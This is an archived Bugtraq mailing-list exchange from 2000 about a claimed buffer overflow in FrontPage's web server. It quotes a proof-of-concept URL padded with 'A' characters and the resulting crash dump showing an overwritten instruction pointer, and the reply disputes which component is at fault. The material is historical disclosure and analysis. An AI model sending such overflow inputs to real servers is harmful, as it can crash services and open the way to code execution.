Bugtraq mailing list archives

Re: More vulnerabilities in FP


From: ddoc () MIA CZ (Daniel Dočekal)
Date: Mon, 24 Apr 2000 20:39:12 +0200


That's hardly an overflow in FP. VHTTPD32 does not seem to be part of WindowsNT,
and even less so of FrontPage (it could be some old version, of course). What
operating system are you using?

This seems to be an overflow in HTTP (Web Server, PWS or IIS), and for
WindowsNT it was handled a long time ago in some postfix and service packs.

It would be a good idea to include complete information about the system you
are testing; otherwise it is useless.

Daniel

-----Original Message-----
From: Roman [mailto:webmad () MAIL RU]
Sent: Saturday, April 22, 2000 10:16 PM
To: BUGTRAQ () SECURITYFOCUS COM
Subject: Re: More vulnerabilities in FP


Hello,

First remote FrontPage exploit?

How about this one:
http://server/AAAAAAAAAAAA<a lots of A>AAAAAA

FP will overflow and someone will see this message:

VHTTPD32 caused an invalid page fault in
module <unknown> at 0000:41414141.
Registers:
EAX=00000000 CS=0167 EIP=41414141 EFLGS=00010212
EBX=00000000 SS=016f ESP=00fe53cc EBP=41414141
ECX=00fe52c4 DS=016f ESI=00fe7744 FS=3647
EDX=bffc9490 ES=016f EDI=bff94645 GS=0000
Bytes at CS:EIP:

Stack dump:
41414141 41414141 66204141 656c6961 6f662064 32312072
2e302e37 2c312e30 61657220 3a6e6f73 6c696620 6f642065
6e207365 6520746f 74736978 00000000

Tested on FP 3.0.2.926. Maybe others?


